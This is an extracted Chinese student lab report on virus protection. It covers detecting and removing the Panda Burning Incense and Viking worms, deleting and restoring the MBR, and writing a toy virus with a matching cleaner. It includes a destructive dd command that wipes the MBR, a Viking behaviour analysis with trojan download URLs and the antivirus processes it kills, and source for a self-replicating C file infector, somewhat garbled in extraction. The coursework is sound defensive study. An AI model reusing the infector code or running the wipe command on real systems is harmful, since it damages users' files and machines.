计算机病毒防护技术实验报告.doc

《计算机病毒防护技术实验报告.doc》由会员分享，可在线阅读，更多相关《计算机病毒防护技术实验报告.doc（19页珍藏版）》请在三一办公上搜索。

1、计算机病毒防护技术实验报告学院： 计算机科学与技术 班级： 20110616 姓名： 曾江东 学号： 2011061624 成绩： 2014年10月实验1 典型病毒的检测1.1 实验名称熊猫烧香病毒的检测1.2 实验目的掌握典型病毒的检测方法，掌握熊猫烧香病毒的检测方法，掌握威金病毒的检测方法。1.3 实验环境微机1台（Windows 9x2000XP操作系统），熊猫烧香病毒样本、威金病毒样本，熊猫烧香病毒专杀工具、威金病毒专杀工具，VMWare虚拟机软件。1.4 实验内容及要求1.4.1 熊猫烧香病毒的检测1、 备好病毒样本先准备一张含有熊猫烧香病毒的软盘或光盘，或带有熊猫烧香病毒的U盘。2

2、、 运行VMWare虚拟机软件。为了整个计算机本身的安全或整个实验室系统的安全，让实验在虚拟的环境下进行，3、 检测干净系统4、 种植熊猫烧香病毒插入含有熊猫烧香病毒的U盘、光盘或者软盘，点击含有熊猫烧香病毒文件夹下的setup.exe文件，这时就将熊猫烧香病毒种植到计算机系统中了。5、 检测中毒后的系统6、 得出实验结论1.3.2 威金病毒的检测1、 备好病毒样本2、 先准备一张含有威金病毒的软盘或光盘，或带有威金病毒的U盘。3、 运行VMWare虚拟机软件。4、 为了整个计算机本身的安全或整个实验室系统的安全，让实验在虚拟的环境下进行，5、 检测干净系统6、 种植威金病毒插入含有威金病毒的

3、U盘、光盘或者软盘，点击含有威金病毒文件夹下的威金文件，这时就将威金病毒种植到计算机系统中了。7、 检测中毒后的系统8、 实验结论1.5 实验设计与实验步骤1. 运行VMWare虚拟机软件。2. 插入含有熊猫烧香病毒的U盘、光盘或者软盘，点击含有熊猫烧香病毒文件夹下的setup.exe文件，这时就将熊猫烧香病毒种植到计算机系统中了。3. 查看磁盘是否有一些exe文件的图标被改成了一个座立的熊猫手里捧着三根香。4. 用熊猫烧香病毒专杀工具检测系统是否中毒。1.6 实验过程与分析通过查看系统磁盘的一些文件，发现一些exe文件确实被改成了熊猫图标，随后利用熊猫烧香病毒专杀工具也检测出系统确实中毒1.

4、7 实验结果总结成功将熊猫烧香病毒植入电脑，并成功检测出来。1.8 心得体会感觉将病毒从虚拟的世界弄了出来。实验2 典型病毒的清除2.1 实验名称熊猫烧香病毒的清除2.2 实验目的掌握典型病毒的清除方法，掌握熊猫烧香病毒的清除方法，掌握威金病毒的检清除方法。2.3 实验环境微机1台（Windows9x2000XP操作系统），熊猫烧香病毒样本、威金病毒样本，熊猫烧香病毒专杀工具、威金病毒专杀工具，VMWare虚拟机软件。2.4 实验内容及要求2.4.1 熊猫烧香病毒的清除(1) 熊猫症状表现为:(1.1) 某些EXE文件的图标被改成一个座立的熊猫手里捧着三根香,因此得名,(1.2) 隐藏文件属性

5、无法修改，即显示所有隐藏文件的勾选去掉也不能显示隐藏文件；(1.3) 双击分区盘符无法打开显示内容，必须通过右键打开才可以打开；如果你的电脑出现以上症状那一定是中着了！可以通过以下手工删除（删除前断开网络）(2) 手工清除：(2.1) 清除病毒第一步：点击“开始-运行”，输入ntsd -c q -pn spoclsv.exe并确定，结束病毒的进程。（或进入到文件夹c:windows(Windows2000下为winnt, windowsXP下为windows)system32drivers中修改spoclsv.exe的文件名为其他的.exe文件），之后我们就可以进入到任务管理器和注册表中了。第

6、二步：在注册表中寻找“HKEY_LOCAL_MACHINESOFTWAREMICROSOFTWINDOWSCURRENTVersionExplorerAdvancedFolderHiddenSHOWALL”,将CheckedValue的值改为1。打开“HKEY_CURRENT_USERSoftwareMicrosoftWindowsCrrentVersionRun”，将svcshare的项目删除。第三步：删除硬盘各分区根目录下的setup.exe和autorun.inf文件；删除掉C:Windowssystem32drivers下的spoclsv.exe文件。第四步：搜索硬盘上的网页格式文件，

7、找到其中类似”“的文字，将其删除。被嵌入的代码可能是其他的网站。(2.2) 显示出被隐藏的系统文件 运行regedit HKEY_LOCAL_MACHINESoftwareMicrosoftwindowsCurrentVersionexplorerAdvancedFolderHiddenSHOWALL，将CheckedValue键值修改为1 这里要注意，病毒会把本来有效的DWORD值CheckedValue删除掉，新建了一个无效的字符串值CheckedValue，并且把键值改为0！我们将这个改为1是毫无作用的。（有部分病毒变种会直接把这个CheckedValue给删掉，只需和下面一样，自己再重

8、新建一个就可以了） 方法：删除此CheckedValue键值，单击右键 新建Dword值命名为CheckedValue，然后修改它的键值为1，这样就可以选择“显示所有隐藏文件”和“显示系统文件”。 在文件夹工具文件夹选项中将系统文件和隐藏文件设置为显示 重启电脑后，发现杀毒软件可以打开，分区盘双击可以打开了。(3) 如何防范”熊猫烧香“病毒第一，该病毒会利用IE，QQ，UC等的漏洞进行传播。所以需要即使安装他们的最新补丁程序。第二，计算机应设置复杂的密码，以防止病毒通过局域网传播。第三，关闭系统的”自动运行“功能，防止病毒通过U盘，移动硬盘等侵入你的电脑。(4) 附：结束进程的方法：调出win

9、dows任务管理器(Ctrl+Alt+Del),发现通过简单的右击当前用户名的*.exe来结束进程是行不通的.会弹出该进程为系统进程无法结束的提醒框;鼠标右键点击任务栏，选择任务管理器。点击菜单查看(V)选择列(S).，在弹出的对话框中选择PID（进程标识符），并点击确定。找到映象名称为*.exe，并且用户名不是SYSTEM的一项，记住其PID号.点击开始-“运行”，输入CMD，点击确定打开命令行控制台。输入ntsd c q -p (PID)，比如我的计算机上就输入ntsd c q -p 1132.2.4.2 威金病毒的清除病毒名称 “威金（Worm.Viking）” 病毒别名 Virus.W

10、in32.Delf.62976 Kaspersky, W32/HLLP.Philis.j McAfee,W32.Looked symantec Net-Worm.Win32.Zorin.a 病毒型态 Worm (网络蠕虫) 影响平台 Windows 95/98/ME , Windows NT/2000/XP/2003 一、worm.viking 病毒的特点:worm.viking 病毒的行为：该病毒为Windows平台下集成可执行文件感染、网络感染、下载网络木马或其它病毒的复合型病毒，worm.viking 病毒运行后将自身伪装成系统正 常文件，以迷惑用户，通过修改注册表项使病毒开机时可以自动

11、运行，同时worm.viking病毒通过线程注入技术绕过防火墙的监视，连接到病毒作者指定的 网站下载特定的木马或其它病毒，同时病毒运行后枚举内网的所有可用共享，并尝试通过弱口令方式连接感染目标计算机。运行过程过感染用 户机器上的可执行文件，造成用户机器运行速度变慢，破坏用户机器的可执行文件，给用户安全性构成危害。worm.viking 病毒主要通过共享目录、文件捆绑、运行被感染病毒的程序、可带病毒的邮件附件等方式进行传播。 1、worm.viking病毒运行后将自身复制到Windows或相关文件夹下，名为rundl132.exe或者rundll32.exe。2、worm.viking病毒运行后

12、，将病毒体复制到windows目录下为logo_1.exe、vdll.dll及zvdll.exe等文件。4、worm.viking病毒搜索所有可用分区中的大小为27kb-10mb的exe文件及RAR文件并感染，症状就是文件图标被修改，在所有文件夹中生成_desktop.ini 文件(属性:系统、隐藏)。5、worm.viking病毒会尝试修改%SysRoot%system32driversetchosts文件。6、worm.viking病毒通过添加如下注册表项实现病毒开机自动运行: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion

13、Run load=C:WINNTrundl132.exe HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWindows load=C:WINNTrundl132.exe7、worm.viking病毒运行时尝试查找窗体名为:RavMonClass的程序，查找到窗体后发送消息关闭该程序。8、枚举以下杀毒软件进程名，查找到后终止其进程: Ravmon.exe Eghost.exe Mailmon.exe KAVPFW.EXE IPARMOR.EXE Ravmond.exe9、病毒尝试利用以下命令终止相关杀病毒软件：net stop

14、 Kingsoft AntiVirus Service10、发送ICMP探测数据Hello,World，判断网络状态，网络可用时，枚举内网所有共享主机，并尝试用弱口令连接IPC$、admin$等共享目录，连接成功后进行网络感染。11、不感染系统文件夹中的文件，如windows、system、system32、winnt等等。12、枚举系统进程，尝试将病毒dll(vdll.dll)选择性注入Explorer、Iexplore进程。13、当外网可用时，被注入的dll文件尝试连接以下网站下载并运行相关程序:http:/www.17*.com/gua/zt.txt保存为:c:1.txthttp:/ww

15、w.17*.com/gua/wow.txt保存为:c:1.txthttp:/www.17*.com/gua/mx.txt保存为:c:1.txthttp:/www.17*.com/gua/zt.exe保存为:%SystemRoot%Sy.exehttp:/www.17*.com/gua/wow.exe保存为:%SystemRoot%1Sy.exehttp:/www.17*.com/gua/mx.exe保存为:%SystemRoot%2Sy.exe 注：三个程序都为木马程序 14、修改注册表将启动文件及内容添加到以下相关注册表项：HKEY_LOCAL_MACHINESOFTWAREMicrosof

16、tWindowsCurrentVersionRun目录下的运行rundll32.exe的值。 HKEY_LOCAL_MACHINESOFTWARESoftDownloadWWWauto=1 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsver_down0=boot loader+ver_down1=boot loadertimeout=30operating systemsmulti(0)disk(0)rdisk(0)partition(1)WINDOWS=Microsoft Windows XP Professional /ver_down2=defau

17、lt=multi(0)disk(0)rdisk(0)partition(1)WINDOWSoperating systemsmulti(0)disk(0)rdisk(0)partition(1)WINDOWS=Microsoft Windows XP Professional / 主要症状: 1、占用大量网速，使机器使用变得极慢。 2、会捆绑所有的EXE文件，只要一运用应用程序，在winnt下的logo1.exe图标就会相应变成应用程序图标。 3、有时还会时而不时地弹出一些程序框，有时候应用程序一起动就出错，有时候起动了就被强行退出。 4、阻止以下杀毒软件的运行,包括卡八斯基、金山公司的毒霸、

18、瑞星等98%的杀毒软件运行。 5、访问部分反病毒安全网站时，浏览器就会重定向到66.197.186.149 详细技术信息： 病毒运行后，在%Windir%生成 Logo1_.exe 同时会在windws根目录生成一个名为virDll.dll的文件。 该蠕虫会在系统注册表中生成如下键值： HKEY_LOCAL_MACHINESoftwareSoftDownloadWWW auto = 1 病毒感染运行windows操作系统的计算机，并且通过开放的网络资源传播。一旦安装，蠕虫将会感染受感染计算机中的.exe文件。 该蠕虫是一个大小为82K的Windows PE可执行文件。通过本地网络传播。该蠕虫会

19、将自己复制到下面网络资源： ADMIN$ IPC$二、手动清除病毒方法在进程中找到并结束Logo1_.exe、rundl132.exe进程 1. 找到并删除%Windir%下的Logo1_.exe、rundl132.exe、vDll.dll、DLL.DLL文件 （部分文件不一定存在）2. 打开注册表，索引到HKEY_LOCAL_MACHINESoftwareSoftDownloadWWW，删除auto键值 3. 打开注册表，索引到HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWIndows，删除load键值 4. 打开%sy

20、stem%driversetc下hosts文件，删除“127.0.0.1 localhost”一行后所有内容 5. 下载”Worm.Viking专杀工具“，在安全模式下全盘杀毒。 6. 插入系统光盘，重做系统 备注:输入regedit进入系统注册表，查找到HKEY_LOCAL_MACHINESOFTWARE MicrosoftWindowsCurrentVersionRun删除字符串load=C:Windows rundl132.exe查找到HKEY_CURRENT_USERSoftwareMicrosoftWindows NT CurrentVersionWindows删除字符串load=C

21、:Windowsrundl132.exe查找到HKEY_LOCAL_MACHINESOFTWARE删除下面整个soft项，其中包括所带的DownloadWWW。查找到HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows删除所有ver_down数字的字符串值。另外一个方法： 第一步、 用同时按下CTRL,ALT,DEL三键打开任务管理器,结束logo1_.exe进程. 第二步、 删除操作系统盘(一般是C盘)winnt目录下的logo1_.exe文件. 可以看出,以上两步是很普通的,大部分人都会,关键是第三步. 第三步、 在操作系统盘(一般是C盘)winnt目录下,

22、创建一个文件夹(记住是文件夹而不是文件),文件夹名为logo1_.exe,并设置该文件夹的属性为只读+隐藏. 这样logo1_.exe病毒再也无法运行了,也就是它的破坏作用(比如降低网速)也消失了.唯一的缺陷就是那些变色的应用程序图标还是依旧.如果你希望应用程序的图标恢复,那么(1)你可以重装系统,记住重装系统后一定要在winnt目录下,创建一个名叫logo1_.exe文件夹并设置该文件夹的属性为只读+隐藏,以防再次感染，使电脑得到免疫.也可以(2)等到能够杀该病毒的软件诞生为止。杀毒原理：创建logo1_.exe文件夹,使无法创建logo1_.exe文件,把文件夹设为只读+隐藏使安全性更高.

23、2.5 实验设计与实验步骤1. 首先点击“开始-运行”，输入ntsd -c q -pn spoclsv.exe并确定，结束病毒的进程。（或进入到文件夹c:windows(Windows2000下为winnt, windowsXP下为windows)system32drivers中修改spoclsv.exe的文件名为其他的.exe文件），之后我们就可以进入到任务管理器和注册表中了。2. 在注册表中寻找“HKEY_LOCAL_MACHINESOFTWAREMICROSOFTWINDOWSCURRENTVersionExplorerAdvancedFolderHiddenSHOWALL”,将Chec

24、kedValue的值改为1。打开“HKEY_CURRENT_USERSoftwareMicrosoftWindowsCrrentVersionRun”，将svcshare的项目删除。3. 删除硬盘各分区根目录下的setup.exe和autorun.inf文件；删除掉C:Windowssystem32drivers下的spoclsv.exe文件。4. 搜索硬盘上的网页格式文件，找到其中类似”“的文字，将其删除。被嵌入的代码可能是其他的网站。5. 运行regedit HKEY_LOCAL_MACHINESoftwareMicrosoftwindowsCurrentVersionexplorerAd

25、vancedFolderHiddenSHOWALL，将CheckedValue键值修改为1 这里要注意，病毒会把本来有效的DWORD值CheckedValue删除掉，新建了一个无效的字符串值CheckedValue，并且把键值改为0！我们将这个改为1是毫无作用的。（有部分病毒变种会直接把这个CheckedValue给删掉，只需和下面一样，自己再重新建一个就可以了） 方法：删除此CheckedValue键值，单击右键 新建Dword值命名为CheckedValue，然后修改它的键值为1，这样就可以选择“显示所有隐藏文件”和“显示系统文件”。在文件夹工具文件夹选项中将系统文件和隐藏文件设置为显示

26、重启电脑后，发现杀毒软件可以打开，分区盘双击可以打开了。2.6 实验过程与分析1. 确保所以中毒文件都删除了。2. 确保所以中毒文件都恢复了。2.7 实验结果总结 成功将电脑内的熊猫烧香病毒都清除干净了，电脑恢复正常使用。2.8 心得体会了解了这样清除电脑内的病毒，而不用因为一点小小的病毒就去检修，浪费我的时间，而可以通过自己的努力将病毒清除干净。实验3 计算机系统修复实验3.1 实验名称计算机系统修复实验3.2 实验目的掌握修复MBR的方法，在Linux下通过先损坏MBR前446字节的数据来验证一下修复MBR的方法。3.3 实验环境微机1台（Windows9x2000XP操作系统），VMWa

27、re虚拟机软件。3.4 实验内容及要求破坏与修复mbr。3.5 实验设计与实验步骤1. 破坏MBR数据dd if=/dev/zero of=/dev/sda bs=1 count=4462. 重新启动系统验证系统在MBR损坏的情况下不能正常启动。3. 如果系统不能正常启动了，就说明MBR被损坏了。4. 那么只有进入Linux救援模式下进行MBR修复进入救援模式步骤： a.系统启动按F2（虚拟机下）修改BIOSb.在光盘引导启动界面，键入linux rescue此时你的操作系统是被挂载在/mnt/sysimage下，而不是在跟分区下，所以要执行chroot命令来切换挂载分区e.然后切换根目录运行

28、命令f. 使用以下命令重新安装MBR上引导装载程序的前446字节5. 最后重启系统验证一下MBR是否修复成功。3.6 实验过程与分析1. mbr损坏后，重启后发现系统不能启动了2. 将mbr修复成功后，再次重启电脑，发现系统正常启动。3.7 实验结果总结 成功将崩溃的系统修复成功，使之能正常使用。3.8 心得体会学习了一些Linux系统下的知识。实验4 病毒程序和杀毒程序编程实验4.1 实验名称病毒程序和杀毒程序编程实验4.2 实验目的掌握病毒程序和杀毒程序编程方法，编程实现一个简单的病毒程序，并编写杀毒程序将其杀掉。4.3 实验环境微机一台（Windows9x2000XP7操作系统），编译器

29、 Dev C+4.4 实验内容及要求编写一个病毒，观察其发作现象，编写一个相应的杀毒程序，进行此病毒的检测与查杀。4.5 实验设计与实验步骤1. 运行VIRUS.C程序，系统部分文件中病毒；2. 运行病毒清除程序REVIURS.C，病毒被清除成功，系统恢复正常。4.6 实验过程与分析运行病毒程序后，通过查看系统文件，发现确实出现了病毒，说明病毒种植成功。接下来就是病毒的清除了。运行杀毒程序，重启电脑，查看系统文件，发现病毒都被清除干净。 4.7 实验结果总结成功实现了病毒程序的运行将病毒种植入电脑内，然后通过运行杀毒程序将种植的病毒清除干净。4.8 心得体会学会了简单病毒程序的编写以及其相应的

30、杀毒程序的编写。源码病毒清除程序REVIURS.C/*INFECTED*/#includestdio.h#includedos.h#includedir.hmain()viruses();intviruses_sub()structffblkffblk;intdone,i,j,k,n_line;FILE*virus_r,*virus_v;/*virus_r指向将被感染的文件，virus_v指向已带病毒的文件*/chara50080,b80,*p1,*p2;/*将被传染的文件读入a50080临时存放*/staticcharviruses_f=virus.c;/*文件被传染后，修改该值为自身文件名

31、*/intinclude_write;intvirus_call=0;intvirus_start=0;char*main_flag=printf,break,for,while;char*include_h=dos.h,stdio.h,dir.h;char*v_flag=INFECTED;structdatetoday;/*VIRUSESDISPLAY*/getdate(&today);/*病毒显示日期信息*/printf(Todayis%d/%d/%dn,today.da_mon,today.da_day,today.da_year);/*AFFECTVIRUSES*/done=findf

32、irst(*.c,&ffblk,0);/*查找第一个匹配文件*/while(!done)if(strcmp(ffblk.ff_name,REVIRUS.C)!=0)virus_r=fopen(ffblk.ff_name,r+w);if(virus_r!=NULL)p1=fgets(&a00,80,virus_r); if(strstr(p1,v_flag0)=NULL) n_line=0;/*把文件全部读入a50080*/ while(p1!=NULL) n_line+; p1=fgets(&an_line0,80,virus_r); if(n_line=500) fclose(virus_r

33、); return(1); fseek(virus_r,0,SEEK_SET); virus_v=fopen(&viruses_f0,r); /*打开带病毒的文件*/ if(virus_v=NULL)fclose(virus_r); return(2); for(i=1;i5;i+)/*读带病毒文件前4行并写入将被传染的文件*/ p2=fgets(b,80,virus_v); if(p2=NULL)fclose(virus_r); fclose(virus_v); return(3);fputs(b,virus_r);for(j=0;jn_line;j+)/*把将被传染文件的原程序写回原文件*

34、/include_write=1;/*不写入病毒文件已有的包含语句*/if(strstr(&aj0,#include)!=NULL)for(i=0;i3;i+)if(strstr(&aj0,include_hi)!=NULL) include_write=-1;if(virus_call=0)/*插入调用语句，并加上回车换行*/ for(i=0;i4;i+)if(strstr(&aj0,main_flagi)!=NULL)for(k=0;k80;k+) bk=0;strcpy(&b0,viruses();); b10=13; b11=10;fputs(b,virus_r);virus_call

35、=1; i=4;if(include_write=1)fputs(&aj0,virus_r);p1=fgets(b,80,virus_v);/*把病毒子程序写入文件*/while(p1!=NULL)if(virus_start=0)/*找病毒子程序的第一条语句*/ if(strstr(p1,intviruses_sub()!=NULL) virus_start=1; if(virus_start=1)if(strstr(p1,char)!=NULL)if(strstr(p1,viruses_f=)!=NULL)strcpy(&b29,ffblk.ff_name); i=strlen(&b0);

36、 bi=34;strcpy(&bi+1,);); bi+3=13; bi+4=10; fputs(b,virus_r); p1=fgets(b,80,virus_v); fclose(virus_v); fclose(virus_r); return(0);fclose(virus_r);done=findnext(&ffblk);return(4);viruses() intnum;num=viruses_sub(); switch(num)case0:printf(successfuln);break;case1:printf(thefileisoutoflinen);break;case

37、2:printf(thevirusesfilecannotopenn);break;case3:printf(cannotreadvirusesfilen);break;case4:printf(cannotfindfilen);getch();杀毒程序REVIURS.C#includestdio.h#includedos.h#includedir.hmain()structffblkffblk;intdone,i,j,line,k;staticintn_line;FILE*virus_r,*virus_v;chara50080,b80,*p;char*v_flag=INFECTED;done=findfirst(*.c,&ffblk,0);while(!done)if(strcmp(ffblk.ff_name,VIRUS.C)!=0)for(k=0;k500;k+)for(j=0;j80;j+)ak